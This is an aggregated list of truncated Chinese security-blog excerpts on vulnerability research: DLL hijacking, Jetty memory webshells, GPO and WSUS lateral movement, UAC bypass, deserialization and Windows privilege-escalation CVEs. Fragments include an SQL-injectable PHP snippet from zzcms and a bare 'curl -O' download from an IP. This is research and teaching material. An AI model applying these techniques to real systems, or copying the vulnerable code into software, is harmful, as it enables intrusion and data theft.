《三生缘》—清纪昀 三生谁更问前因,一念缠绵泣鬼神. 缘尽犹寻泉下路,魂归宛见梦中人. 城乌啼夜传幽怨,怨冢树连认化身
Source: rebeyond
文章作者:rebeyond受影响版本:v6~v7漏洞说明:JEECMS是国内Java版开源网站内容管理系统(java cms、jsp cms)的简称. 该系统基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点;采用SpringMVC3+Spring3+Hibernate3+Fre
Source: rebeyond
12author: anhkggdate: 2021年6月19日 前情提要最近在分析某个软件时,提示错误. 赶紧挂上windbg看看调用栈,看能不能找到问题. 一看应该能够解决,需要结合IDA静态分析
Source: anhkgg
author: anhkggdate: 2021-01-14 11:17:27 了解一点操作系统知识的同学们应该都知道,文件占用无法删除,是因为某些进程正在使用该文件. 要删除这样的文件,就需要让那些进程关闭文件,然后自然可以删除. 一句话的事,那究竟要怎么用代码来实现这个功能呢
Source: anhkgg
author: anhkggdate: 2019年11月6日 让友商电脑兼容了一下华为系专属的多屏协同功能 笔者注:文中出现的大写C,请轻声念出北京大爷的口头禅. 华为刚发布多屏协同功能的时候,我就被种草了. 后来一天在微博看到@Navis-MDT发布的一个体验视频,果然碉堡了
Source: anhkgg
作者:anhkgg日期:2019年11月3日 很多时候,可能会对某个软件进行DLL劫持. 而这个软件是否存在DLL劫持漏洞,需要去分析验证. 比如通过IDA查看导入的DLL,或者LoadLibrary的DLL,然后慢慢排除某些KnownDlls,排除某些绝对路径加载的DLL… 或者通过Windbg分析
Source: anhkgg
author: anhkggdate: 2019年10月17日 原标题:造轮子,撸工具的乐趣QQ交流群:753894145 从开始学习编程到现在,一直喜欢写些小工具,也会重复造轮子. 为什么要自己撸呢. ~当然是因为别人撸的不好(逃)~
Source: anhkgg
author: anhkggdate: 2019-10-05 最早接触沙箱,对它的印象就是:sandboxie. 因为学的是安全相关专业,在网上下载东西非常谨慎,就算通过了杀毒软件扫描,但是也怕有后门或者其他东西,毕竟我也可以静态过掉杀软. 很多软件没有官网,各种下载站的东西真的是让人不放心
Source: anhkgg
唠叨群里有人推了个项目TgWechat,微信端对端加密插件,还特意@了我表示感谢,受宠若惊. 隐私问题其实说了很久,有人说微信其实一直看着我们聊天,具体是怎么样的,咱也不知道,咱也不敢问吖… 谁没个秘密呢,或者和朋友开个玩笑,或者和伴侣聊点”家常”,如果这些内容暴露在别人眼中,确实有点尴尬,但毕竟咱也没乱说啥吖… 不过加密聊天也可有能会给某些人提供某些庇护,导致出现一些安全问题,这也是一个大问题… 所以你让我说微信到底要不要、能不能看我们聊天内容,我确实也说不好… 所以这里不讨论这种问题,我只聊技术
Source: anhkgg
QQ交流群:753894145 9102年了,我想大部分人使用微信的频率应该都会高于QQ了吧. 以前在QQ传文件的时候,哪里会想到会有文件大小限制,几G、几十G的文件随意传. 而现在,用微信传文件,很尴尬,只能传100M或更小的文件
Source: anhkgg
如何防止别人调用自己的函数
Source: anhkgg
微信相关研究技术文章收集,版权属于原作者,不定时更新. 欢迎关注:https://github. com/anhkgg/awesome-wechat-technology QQ交流群:753894145
Source: anhkgg
QQ交流群:753894145 欢迎关注技术公众号:汉客儿 微信PC端技术研究-保存聊天语音by anhkgg(公众号:汉客儿)2019年1月31日 0x0. 前言虽然一直知道CE,也用过一段时间,但一直用不好,可能太笨. 最近又学习了某位大佬用CE的方法,大佬的一句话有点醍醐灌顶,然后有了新的感觉,然后开始尝试实践这篇文章
Source: anhkgg
欢迎关注技术公众号:汉客儿 微信PC端技术研究-消息防撤销by anhkgg2018年11月30日 0x1. 写在前面不知道大家有没有遇到过这种情况,微信收到消息,但是没有及时查看,然后闲暇时去看的时候,消息被撤销了,撤销了. 那时肯定是无比无语,挠心挠肺,究竟发了什么
Source: anhkgg
QQ交流群:753894145 欢迎关注技术公众号:汉客儿 通用DLL劫持技术研究by anhkgg2018年11月29日 写在前面Dll劫持相信大家都不陌生,理论就不多说了. Dll劫持的目的一般都是为了自己的dll模块能够在别人进程中运行,然后做些不可描述的事情. 为了让别人的程序能够正常运行,通常都需要在自己的dll中导出和劫持的目标dll相同的函数接口,然后在自己的接口函数中调用原始dll的函数,如此使得原始dll的功能能够正常被使用
Source: anhkgg
0x1. 前言 Python 代码先被编译为字节码后,再由Python虚拟机来执行字节码, Python的字节码是一种类似汇编指令的中间语言, 一个Python语句会对应若干字节码指令,虚拟机一条一条执行字节码指令, 从而完成程序执行. Python dis 模块支持对Python代码进行反汇编, 生成字节码指令
Source: anhkgg
漏洞概述 软件网址:http://safe. 2345. cc/ 版本:v3
Source: anhkgg
漏洞概述 软件网址:http://safe. 2345. cc/ 版本:v3
Source: anhkgg
概述已经快2个月了吧,已经忘了是什么原因突然搞起了驱动漏洞,反正就是很有兴致地想挖掘一下驱动漏洞. 在网上了解了基本的驱动漏洞挖掘方法,主要是通过ioctl接口进行挖掘,已经有很多相关fuzz工具了,比如ioctlbf、kDriver-Fuzzer等等. kDriver-Fuzzer的作者k0keoyo在2017年收获了100多个CVE,很牛逼啊,这个已经2018年了,再来挖此种类型的驱动是不是已经晚了啊,心中苦涩啊
Source: anhkgg
配置需求1. 目标主机有USB3. 0 xHCI主机控制器,支持调试2
Source: anhkgg
作者:anhkgg 日期:2017-11-16 rustls已经支持tls1. 3,但是测试分析中使用的tls1. 2,所以后面分析主要集中在tls1
Source: anhkgg
NET框架可以通过用户自定义环境变量和CLSID注册表项来加载profiler DLL或者COM组件DLL,甚至当前进程是提权的. 这种行为可以被利用来绕过Windows 7到10(包括最近的RS3)系统的默认UAC设置,如通过自动提权. NET进程(MMC管理单元)来加载任意的DLL
Source: anhkgg
0x00 前言 在上篇文章介绍了Jetty Filter型内存马的实现思路和细节,本文介绍Jetty Servlet型内存马的实现思路和细节 0x01 简介 本文将要介绍以下内容: 实现思路 实现代码 Zimbra环境下的Servlet型内存马 0x02 实现思路 同样是使用Thread获得webappclassloaer,进而通过反射调用相关方法添加Servlet型内存马 0x03 实现代码 1. 添加Servlet Jetty下可用的完整代码如下: <%@ page import="java. lang
Source: 3gstudent(三好学生)
0x00 前言 关于Tomcat Filter型内存马的介绍资料有很多,但是Jetty Filter型内存马的资料很少,本文将要参照Tomcat Filter型内存马的设计思路,介绍Jetty Filter型内存马的实现思路和细节. 0x01 简介 本文将要介绍以下内容: Jetty调试环境搭建 实现思路 实现代码 Zimbra环境下的Filter型内存马 0x02 Jetty调试环境搭建 1. 添加调试参数 JDK 8版本对应的调试参数为:java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar start
Source: 3gstudent(三好学生)
0x00 前言 在之前的文章《域渗透——利用GPO中的计划任务实现远程执行》介绍了通过域组策略(Group Policy Object)远程执行计划任务的方法,本文将要介绍类似的另外一种方法:通过域组策略(Group Policy Object)的脚本实现远程执行. 0x01 简介 本文将要介绍以下内容: 通过Group Policy Management Console (GPMC) 实现脚本的远程执行 通过命令行实现脚本的远程执行 新建GPO实现远程执行 修改已有的GPO,实现远程执行 实现细节 0x02 通过Group Policy Management Console (GPMC) 实现脚本的远程执行 1. 创建GPO 在域控制器上,位置: Administrative Tools -> Group Policy Management 如果想要作用于整个域,选择域test
Source: 3gstudent(三好学生)
0x00 前言 Exchange Powershell基于PowerShell Remoting,通常需要在域内主机上访问Exchange Server的80端口,限制较多. 本文介绍一种不依赖域内主机发起连接的实现方法,增加适用范围. 注: 该方法在CVE-2022–41040中被修复,修复位置:C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft
Source: 3gstudent(三好学生)
0x00 前言 pypsrp是用于PowerShell远程协议(PSRP)服务的Python客户端. 我在研究过程中,发现在Exchange Powershell下存在一些输出的问题,本文将要介绍研究过程,给出解决方法. 0x01 简介 Exchange PowerShell Remoting pypsrp的使用 pypsrp存在的输出问题 解决方法 0x02 Exchange PowerShell Remoting 参考资料: https://docs
Source: 3gstudent(三好学生)
0x00 前言 本文将要介绍FortiOS REST API的相关用法,分享脚本开发的实现细节. 0x01 简介 本文将要介绍以下内容: Fortigate环境搭建 FortiOS REST API两种登录方式 常用操作 常用功能 0x02 Fortigate环境搭建 这里以Fortigate作为FortiOS REST API的测试环境,安装FortiGate for VMware 参考资料:https://getlabsdone. com/how-to-install-fortigate-on-vmware-workstation/ 1
Source: 3gstudent(三好学生)
0x00 前言 本文将要继续扩充开源代码Zimbra_SOAP_API_Manage的实用功能,添加预认证的登录方式,分享开发细节. 0x01 简介 本文将要介绍以下内容: 预认证 计算preauth SOAP实现 开源代码 0x02 预认证 参考资料:https://wiki. zimbra
Source: 3gstudent(三好学生)
0x00 前言 在内网渗透中,当我们获得了WSUS服务器的控制权限后,可以通过推送补丁的方式进行横向移动. 这个利用方法最早公开在BlackHat USA 2015. 本文将要整理这个利用方法的相关资料,结合思路思路,得出行为检测的方法
Source: 3gstudent(三好学生)
0x00 前言 本文记录从零开始搭建Horde Groupware Webmail漏洞调试环境的细节. 0x01 简介 本文将要介绍以下内容: Horde Groupware Webmail安装 Horde Groupware Webmail漏洞调试环境配置 常用知识 0x02 Horde Groupware Webmail安装 参考资料: https://www. horde
Source: 3gstudent(三好学生)
0x00 前言 在上篇文章《Password Manager Pro漏洞调试环境搭建》介绍了漏洞调试环境的搭建细节,经测试发现数据库的部分数据做了加密,本文将要介绍数据解密的方法. 0x01 简介 本文将要介绍以下内容: 数据加密的位置 解密方法 开源代码 实例演示 0x02 数据加密的位置 测试环境同《Password Manager Pro漏洞调试环境搭建》保持一致 数据库连接的完整命令:"C:\Program Files\ManageEngine\PMP\pgsql\bin\psql" "host=127. 0
Source: 3gstudent(三好学生)
0x00 背景最近小火的漏洞CVE-2022-22947虽然原理简单,但是实战利用还是有
Source: c0ny1(回忆飘如雪)
0x00 背景出题人的<a href="https://mp. weixin. qq
Source: c0ny1(回忆飘如雪)
早上起来做早餐,发现窗外的北京城下起了鹅毛大雪. 让我突然想起大学一个“有味道”的人以及他的事. 真是飞雪窗边过,故人心上来
Source: c0ny1(回忆飘如雪)
0x01 背景你是否遇到过这样的情况,黑盒环境下有一个序列化入口. 你将ysoserial所有gadget的测试了一
Source: c0ny1(回忆飘如雪)
0x00 背景有一次通过CVE-2020-14882漏洞打了一台Windows上的<co
Source: c0ny1(回忆飘如雪)
0x01 背景在Java反序列化漏洞炙手可热的当下,许多自动化工具都在使用ysoserial的gadget. 而这些
Source: c0ny1(回忆飘如雪)
0x01 背景一大早就看到L-codes师傅发消息说,Neo-reGeorg jsp服务
Source: c0ny1(回忆飘如雪)
0x01 简介woodpecker-framework是一款高危漏洞综合利用框架,目的是可以狙击高危漏洞,拿到权限
Source: c0ny1(回忆飘如雪)
0x01 背景当下WAF对shiro的防护,确实比较严格. 对rememberMe的长度进行限制,甚至解密paylo
Source: c0ny1(回忆飘如雪)
0x01 背景chunked-coding-converter在0. 2. 1以及之前版本是
Source: c0ny1(回忆飘如雪)
0x01 背景前几周有个同事发给我一个授权的站点,需要拿下webshell权限. 发现存在Java反序列化漏洞,但是
Source: c0ny1(回忆飘如雪)
0x01 背景在内存马横行的当下,蓝队or应急的师傅如何能快速判断哪些Filter/Servlet是内存马,分析内
Source: c0ny1(回忆飘如雪)
想法早在几个月之前就有了,月初收好友之邀请,夜游鼓浪屿,彼时夜朗星稀,山海一色,偶有微波抚足,不觉间有了点写东西的感觉,晚上回到旅社简单写了下. 等回到北京后,不料润色之意全无,就凑合看吧. <img src
Source: c0ny1(回忆飘如雪)
0x01 背景serialVesionUid不一致导致反序列化失败也算是Java反序列化
Source: c0ny1(回忆飘如雪)
0x01 前言本文献给永远的Avicii,严格意义上我不算是一个reaver
Source: c0ny1(回忆飘如雪)
0x01 背景在渗透测试中遇到json数据一般都会测试下有没有反序列化. 然而json库有fastjso
Source: c0ny1(回忆飘如雪)
通过上篇文章《CVE-2020-1938:Tomcat AJP协议文件包含漏洞分析》,我们知道这个漏洞出现在Tomcat默认的两个
Source: c0ny1(回忆飘如雪)
0x01 漏洞简介Tomcat根据默认配置(conf/server. xml)
Source: c0ny1(回忆飘如雪)
0x01 开发背景说起对存在验证码的登录表单进行爆破,大部分人都会想到PKav HTTP
Source: c0ny1(回忆飘如雪)
其实联动sqlmap与burp的插件挺多的,有gson,CO2,sqli-py等等. 但我独爱sqlmap4burp,因为它使用超简单. 原来在Windows下体验还是很ok的,自从换上mac之后就不好使了
Source: c0ny1(回忆飘如雪)
背景因为工作需求要去验证一些PoC,而很多PoC需要开natives-syntax才能跑,如果转成纯JS实现又需要花更多时间,所以需要在Android的app/webview里也实现添加 js-flags,方便后面搞分析 :)
Source: 0xmuhe
背景&目标 CodeQL Cli适合批量做扫描,但是扫描结果并不适合直接做批量的运营,仅适合一些实锤的问题,对于一些还需要人工处理判断的结果就不太适合了(要看源码、调用上下文);如果使用VSCode插件来做,也只是单条规则扫单个/多个数据库,结果倒是很友好,点点点就能读代码来分析了,所以这种用法不适合批量的query扫描. 如果付费的话自然是可以解决了,可以在CI/CD中集成,就方便多了 -. - 但是对于个人使用者来说不太现实,所以我就想用一个简单的办法来实现这个目的 CodeQL cli批量扫描结束后,导入数据库+历史query结果,直接在vscode里运营结果,流程为: 1CI/CD 扫描 ---> 结果(数据库+扫描结果) ---> 导入VSCode运营
Source: 0xmuhe
背景 最近看了一些Bootloader&TZ以及相关的议题,主要是ARM架构下的内容;正好这几个月我的Leader领着我们组一起学习ARMv8&v9架构相关的知识,在阅读这些材料的时候给我提供了不少的帮助,让我理解起来更加容易,也算是变相检验学习成果咯
Source: 0xmuhe
背景 前段时间MOSEC上盘古关于MTK BootROM Exploit的议题非常精彩,所以我画了一些时间对议题内容进行分析,并结合手边能找到的一些材料做了逆向分析,也感谢同事@C0ss4ck在会场拍下了完整的Slide :)
Source: 0xmuhe
背景 严格意义上来说本文应该叫做: <<我本来只是想救个砖,但是却逆向了刷机工具尝试搞清楚android unlock的原理>> :D
Source: 0xmuhe
环境 ubuntu22. 04 ADS + optee-fvp 调用流程梳理 这里直接从optee-examples中最简单的hello world入手来看的,从宏观上来看整个调用流程是 : 1CA --> optee client --> tee driver --> ATF --> TEE --> TA
Source: 0xmuhe
Background 最近阅读了一篇论文<<The Convergence of Source Code and Binary Vulnerability Discovery – A Case Study>>,很巧合的是论文的研究中,关于将SAST工具应用于二进制文件(通过decompiler),即获取伪代码之后,在伪代码上跑SAST工具来找漏洞这个模式我和@C0ss4ck一起做过,在我们收到一些成效之后发现也有人做了类似的工作,不过他好像没有特别深入 :D
Source: 0xmuhe
步骤unzip解开OTA包
Source: 0xmuhe
环境配置本篇主要是环境配置、调试、流程梳理
Source: 0xmuhe
关于Weggli AST Pattern Search 核心是使用和 tree-sitter 库,然后搞了 query-tree 来在 AST上进行搜索,这只能说是匹配特定的代码片段,还达不到程序分析的那个级别,所以理论上只能过程内分析,而且没有上下文啥的 :D 直白点说的话,像是AST的正则表达式,不过某种意义上来说对于使用白盒方案快速召回一些漏洞也是一种借鉴吧
Source: 0xmuhe
背景 MT6737T Android
Source: 0xmuhe
背景&&需求 迫于要分析一些SDK里的协议,需要抓到所有的流量来分析交互过程,所以有了这篇记录,主要是基于实时监控Android设备网络封包做的尝试,然后使用相同的思路扩展到了iOS上
Source: 0xmuhe
BackgroundTrapFuzz的思路Fuzzing Android native库,这就是个简单的Demo,只针对黑盒的库
Source: 0xmuhe
前言 在今年的ByteCTF中,我出了一道pwn题目,距离上一次打比赛/出题已经过去很久了,所以传统的 heap trick 就没有考虑,而是从我日常工作中挖掘的安全风险入手,简化场景,出了一道 chatroom ,看起来像一个web的奇怪题目
Source: 0xmuhe
前言 过去的近一年的时间(本文在21年开的头,期间一直是hidden状态),我接触了万恶的浏览器安全,不过只是一个脚本小子的水平 :(
Source: 0xmuhe
关于Fishhook是Facebook提供的利用MachO文件惰性加载原理,通过修改懒加载和非懒加载两个表的指针达到C函数HOOK的目的一个轻量级的hook库. 理解这个工具和熟悉流程也是可以帮助更好的理解MachO文件格式 :)
Source: 0xmuhe
ENVmacos11. 4 + iphone6 iOS 12. 2
Source: 0xmuhe
CVE-2021-30660 - XNU Kernel Memory Disclosure
Source: 0xmuhe
roadmap之前在 iosre看到一张比较系统的iOS逆向学习路线图,因为接触过一段时间macOS上服务的漏洞挖掘,所以对*OS安全还是挺有兴趣的,也一直想系统性地学习下iOS逆向,之前的一直不成体系,也很零碎,正好对着这个图重构下知识体系
Source: 0xmuhe
关于之前做过的一些使用CodeQL对JS/TS项目做扫描的笔记
Source: 0xmuhe
BAS那点事儿笔者之前的工作有涉及到BAS相关的工作内容,借此机会也收集和了解了很多BAS相关的内容,了解到国内很多人不了解BAS,以及对于BAS涉及较少,逐写出此篇文章来普及BAS相关知识. 如
Source: Sky
Spring Cloud Function SpEL表达式注入漏洞概述Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),该项目提供了一个通用的
Source: Sky
实现IAST所需要的一些技术通过之前一篇文章,大家应该已经了解到了当前IAST的一些基础知识,如果想要从零实现一个被动式的IAST,我们至少需要掌握关于字节码操作的技术,比如ASM、Javass
Source: Sky
笔者因为之前有过参与RASP研究&研发的一些经验,而且看近两年IAST看着发展势头挺足,所以一直有时间想研究下IAST相关的技术,但是苦于国内外对于IAST具体实现的细节的一些文章并不是很多,唯
Source: Sky
前段时间看到了阿里云发的一篇文章,捕获到了某挖矿软件利用Hadoop Yarn的RPC接口进行执行命令. 上周有空看了下,在java中可以很简单的使用yarnClient调用RPC接口进行通信,其
Source: Sky
本文转自原文链接今天重新搭建了博客,想起来typecho有个可以找到后台的bug(漏洞. ),就随手转载过来,让更多使用typecho的小伙伴看到,或者让大家找typecho后台多一些了解. typ
Source: Sky
刚经历了服务器故障,导致博客内容大部分都丢失的窘境,我今天在重新搭建博客的时候,就顺便将对网站的备份方案进行了完善,主要是以下两点:服务器提供商常态备份核心服务器数据异地备份第一点没什么好说的,
Source: Sky
之前博客存放在vultr上,昨天收到vultr的邮件告知服务器硬件故障,服务器无法恢复,因为一直用的vultr,也就在19年备份了一次,后面就没有对数据再次备份,so,19年以后的数据全部没了,
Source: Sky
导语Apache ShenYu 是一个异步的,高性能的,跨语言的,响应式的 API 网关. 近期发现其历史版本(2. 3
Source: Sky
术语WordPressWordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统. WordPress具有插件架构和模板系统. 截至2018年4月,排名前1000万的网站中
Source: Sky
Author: k0shl of Cyber KunlunSummary In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11. Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step
Source: K0shl
Author: k0shl of Cyber KunlunSummary In recently months, Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure. Microsoft marked them as "Exploitation Less Likely" in assessment status, but actually, I completed the exploitation with these two vulnerabilities. As an annual update blogger(sorry for that:P), I share this blogpost to introduce my exploitation on CNG Key Isolation service, so let's start our journey
Source: K0shl
Author: k0shl of Cyber Kunlun In February 2022, Microsoft patched the vulnerability I used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it "Windows Dirty Pipe"
Source: K0shl
Author: k0shl of 360 Vulcan Team Summary In January 2021 patch tuesday, MSRC patched a vulnerability in splwow64 service, assigned to CVE-2021-1648(also known as CVE-2020-17008), which merged my two interesting cases which bypass the patch of CVE-2020-0986, one of them also be found by Google Project Zero((https://bugs. chromium. org/p/project-zero/issues/detail
Source: K0shl
Author: k0shl of Qihoo 360 Vulcan Team Today, I'd like to share two of my favorite logical escalation of priviledge vulnerabilities which I reported in 2019 -- CVE-2019-0983 and CVE-2019-0998 and a simple introduction about my RPC static analysis script, I public these two PoCs and my script in my github. All of them were found by reversing, actually, I don't know how to trigger it by normal user interactive and monite it with monitor such as procmon. I will share more detail about how I found it in this paper
Source: K0shl
Author: k0shl of 360 Vulcan Team 简述 微软在Windows 10启用了一种新的堆管理机制Low Fragmentation Heap(LFH),在常规的环三应用进程中,Windows使用Nt Heap,而在特定进程,例如lsass. exe,svchost. exe等系统进程中,Windows采用Segment Heap,关于Nt Heap,可以参考Angel boy在WCTF赛后的分享Windows 10 Nt Heap Exploitation,而Segment Heap可以参考MarkYason在16年Blackhat上的议题Windows 10 Segment Heap Internals
Source: K0shl
Author: k0shl of 360 Vulcan Team Overview DsSvc is a data sharing service that provides data sharing between processes. I have not conducted an in-depth analysis of the specific functions of this service. It is known that it provides some methods of file sharing between processes
Source: K0shl
Author: k0shl of 360 Vulcan Team 简述 微软在Insider Preview引入了一个新的缓解机制来阻止普通用户创建硬链接(CreateHardlink),在逻辑漏洞的利用中,hardlink是一个非常实用且便捷的方法,当一个高完整性级别进程对低权限文件操作的时候(这里所谓低权限泛指normal user或更低权限用户可以完全控制的文件),可以利用hardlink将低权限文件链接到高权限文件(高权限是指需高权限例如SYSTEM操作的文件,比如C:\Windows目录下的绝大多数文件及子目录文件),从而会使高权限进程处理高权限文件(比如改变DACL,写入,创建等)这里简述一下利用hardlink的逻辑漏洞利用方法. 关于应用到hardlink技巧的漏洞可以参考Project Zero的James Forshaw的历史漏洞,他提交的逻辑类型漏洞中很多都应用到了hardlink的利用方法. PS: 文中的代码示例均来自Insider preview(build 18898
Source: K0shl
Author: k0shl of 360 Vulcan Team 关于CVE-2018-8550(DfMarshal系列漏洞) 前段时间看了一下James forshaw关于DfMarshal的漏洞,在本子上记录了比较多的东西,于是写这篇博客总结一下,漏洞流程并不复杂,DfMarshal在对对象(object)进行散集(UnMarshal)的过程中,如果object通过聚合(Aggregation)的方式自定义列集(Marshal)方法,最终会导致高权限进程使用特定的Unmarshal方法,在这系列漏洞中即DfMarshal接口, DfMarshal调用自己的UnMarshal方法(来自coml2. dll)而非COM默认的Unmarshal方法(来自combase. dll)
Source: K0shl
作者:k0shl 转载请注明出处:https://whereisk0shl. top 漏洞说明 VideoLAN VLC Media Player是一款播放器,这个漏洞编号为CVE-2016-5108,播放器在处理某数据的时候,由于处理某数据时没有对数据长度进行严格校验,导致越界写入引发拒绝服务漏洞,下面对此漏洞进行详细分析. 软件下载: https://www
Source: K0shl
Author: 01dTan9@SycloverSecurity 目录 <a href="#1-游戏脚本是
Source: Syclover Security Team
Author: Exist@SycloverSecurity2018/09/04 <a href="#lm-hash-nt
Source: Syclover Security Team
前言 在4月17,cnvd通报了一个weblogic的rce漏洞,链接在此 发现是由于async_response这个war包导致的,乍一看这个洞就跟2017的wsat组件很相似. 都是因为xmldecoder反序列化导致的rce. 分析 首先给出调用栈: BaseWSServlet (service)->BaseWSServlet (run) ->SoapProcessor (process)->WsSkel (invoke) ->ServerDispatcher (dispatch)->HandlerIterator (handleRequest) ->WorkAreaServerHandler (handleRequest) ->WorkContextLocalMap (receiveRequest) ->WorkContextEntryImpl (readEntry)->readUTF->readObject 然后就是动态调试过程了
Source: Balis0ng
概述 挖src碰到了一个solr的环境,然后看到国外有人提交了一个关于solr rce的漏洞. 漏洞链接(https://issues. apache
Source: Balis0ng
简介 该漏洞是四月份我在h1上挖到的,原文是英文,为了方便分享,我重新写成中文并发表在博客上. Vanilla是国外的一个论坛程序,是一款开源的PHP程序. github地址为:https://github
Source: Balis0ng
首发先知安全技术社区,博客同步一下. 简介 phpok是一款PHP开发的开源企业网站系统. 在phpok 4
Source: Balis0ng
漏洞描述 怎么说呢,这个CMS以前挖过一次,刚开始确实写得不咋的,后来貌似重构了一下,安全性上了一个档次. 最近看到有人发了这个CMS的漏洞,思路挺不错的,不过文章开头说没有注入,我就试着又审了一次新版. 虽然直观的漏洞不存在了,但是我们细心并且猥琐一点,就可以挖到一个注入了
Source: Balis0ng
因为一直忙学校的事情,很久没发文章了,今天想起来我还有个博客,就随便发一篇吧. 漏洞描述 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统. 由太原迅易科技有限公司于2009年正式推出
Source: Balis0ng
闲来无事做,好久不挖洞了. 搞安卓搞得心烦意乱. 花半小时挖点小cms调节一下
Source: Balis0ng
其实这个漏洞是我作为90sec的开年礼物,不过直到今天才想到要搬到博客上来,也算是一种公开吧. 大家作为学习就行,不要恶意利用攻击他人. 漏洞分析 我们先看漏洞触发点:在/Application/Weibo/Controller/ShareController
Source: Balis0ng
先来看可以导致任意文件删除的地方,在E:/www/zzcms/user/delimg. php中第12行: $id=$_REQUEST['id']; $sql="select img,img2,img3,flv,editor from zzcms_main where id ='$id'"; $rs=mysql_query($sql); $row=mysql_fetch_array($rs); if ($_REQUEST['action']==1){ if ($row['img']<>"/image/nopic. gif"){ $f="
Source: Balis0ng
关于jeb JEB是Android应用静态分析的de facto standard,除去准确的反编译结果、高容错性之外,JEB提供的API也方便了我们编写插件对源文件进行处理,实施反混淆甚至一些更高级的应用分析来方便后续的人工分析. jeb凭借其牛X的保护措施和高昂的售价,使得诸多普通逆向爱好者望而却步. 不过最近国内一些论坛爆出了jeb的2
Source: Balis0ng
[羊城杯 2021]Ez_android
Source: Misaki
Android Crack 2023<h3 id="【
Source: Misaki
安装SIEM安全性资讯与事件 (SIEM) 是一种解决方案,可协助组织在威胁伤害企业运行之前,先进行侦测、分析和回应安全
Source: Misaki
SliverSliver 是一个开源的跨平台红队框架. Sliver 的植入物支持 C2 over Mutual TLS
Source: Misaki
MiniProgram之前的小程序由于服务和小程序的原因已经下线了,现在重新用WordPr
Source: Misaki
UnCrackable-Level1下载地址:
Source: Misaki
在将 dex 文件编译为 oat 文件的过程中 , 只要出现了 DexFile 对象 , 就可以将该对象对应的 dex 文件导出
Source: Misaki
APKey<a href="https://app. hackthebox. com/5a438e22-07d2-4f61-9ab
Source: Misaki
nps未授权访问根据GitHub上的脚本,得知auth_key基本都是本地MD5加密得来的,但在一些系统上测
Source: Misaki
下载unidbg地址:<a href="https://github. com/zhkl0228/unidbg
Source: Misaki
环境变量注入前两天看到一个ACTF的WP,由于没有参加,所以不太清楚题目,但是其中有一个gogogo的题目,利用的是环境
Source: Misaki
云容器安全初识<a href="#API-Server未授权访问" c
Source: Misaki
钉钉RCE大佬的POC:<a href="https://github. com/crazy0x70/dingtalk-RCE"
Source: Misaki
curl -O 2. 58. 149
Source: Misaki
goroutine泄露这里所说的Go内存泄露是指goroutine泄露. 如果你启动了1个g
Source: Misaki
源码源码来自:https://github. com/
Source: Misaki
安装按照官方文档,https://do
Source: Misaki
端午就该吃粽子访问login. php,会给一个这样的链接<a href="http://www. bmzclub
Source: Misaki
CVE-2021-40444Office Word的一个1day,首先来
Source: Misaki
CVE-2
Source: Misaki
前几天慈善家Hex-Rays公开IDA Pro 9,全平台全插件,并且还提供了lumina server的安装程序lumina_teams90_x64linux. run. 不过该服务只能在linux上搭建,下面对搭建的过程进行一次简单的记录
Source: Hcamael
本文将分享从零搭建本地大模型搭建问答知识库过程中遇到的问题和解决方案
Source: Hcamael
本篇文章将对CVE-2024-4577漏洞进行详细分析
Source: Hcamael
前言在甲方待了一段时间发现,在企业中想要提升安全性或者落地某个新的安全能力,总是需要和业务性能进行对比. 如果某个安全特性的性能开销过大,那么对于
Source: Hurricane618(风之栖息地)
前言ARM v8. 3 版本中新增了基于硬件的安全特性PA(Pointer Authentication),并新增了一组相关指令pac和aut,p
Source: Hurricane618(风之栖息地)
一些不错的作品值得更多的人接触,特此写下那些年我接触过的有趣的娱乐作品,我推荐的作品或是能让人获得新颖的体验,或是能让人思考良久,或是能让人轻松愉快. <
Source: Hurricane618(风之栖息地)
前言这篇学习笔记是根据陈浩写的《跟我一起写Makefile》系列文章总结出的内容,这个系列文章对Makefile的讲解深入浅出,对于新人十分友好
Source: Hurricane618(风之栖息地)
为了更加熟悉SELinux,针对这个安全机制的源码部分做了一些梳理,结合了官方的指南丰富了其中的源码实现细节. SELinux博大精深,这篇讲述该机制的内核部分实现,包括贯穿整个机制的两个核心——对系统行为的检查以及标签的转换,以及比较核心的数据和接口. 备注:
Source: Hurricane618(风之栖息地)
距离研究生毕业已经过了4个多月,在这个国庆节期间遇见了很多老同学,包括高中和大学同学,感觉到过了这么几年每个人的人生轨迹都发生了翻天覆地的变化,我想也是时候对自己第一个“人生七年”做个总结,想把这些珍贵的内容记录下来,或许多年之后再次回看会别有一番滋味在心头. 至于为什么我说
Source: Hurricane618(风之栖息地)
学习完王铁磊大佬在华为的分享视频,记录总结一些有用的内容. 还会根据分享的内容再额外补充一些其他相关内容. <a href="#操作系统的演化与安全发展" class="headerlink" title="操作系统的演化与
Source: Hurricane618(风之栖息地)
前言之前一段时间找到了p
Source: Hurricane618(风之栖息地)
前言师兄们曾在牛客上总结了自己的秋招,在反复阅读的过程中深受鼓舞,所以在我的秋招基本告一段落之后也是选择记录下来,为社区贡献一点微薄之力. </p
Source: Hurricane618(风之栖息地)
这个标题看起来确实有点惊悚,但实际上也只是得了一个有点特殊的病. 好在已经恢复的差不多了,记录一下发生过后如何处理,应对以及会给生活带来什么样的影响. <a href="#事发之前的征兆
Source: Hurricane618(风之栖息地)
拖了好久,终于趁着休息的时候简单总结一下第一次hw学习到的东西. (应该也是最后一次) 前期准备<h3 id="资产梳理与排查
Source: Hurricane618(风之栖息地)
文章首发于安全客 https://www. anquanke. com/post/id/238363</p
Source: Hurricane618(风之栖息地)
文章首发于安全客 https://www. anquanke. com/post/id/224972
Source: Hurricane618(风之栖息地)
这周打了一下ByteCTF,发现差距还是很大的,现在的很多堆菜单题都上2. 31,新版本的题目需要多熟悉熟悉. 分析checksec
Source: Hurricane618(风之栖息地)
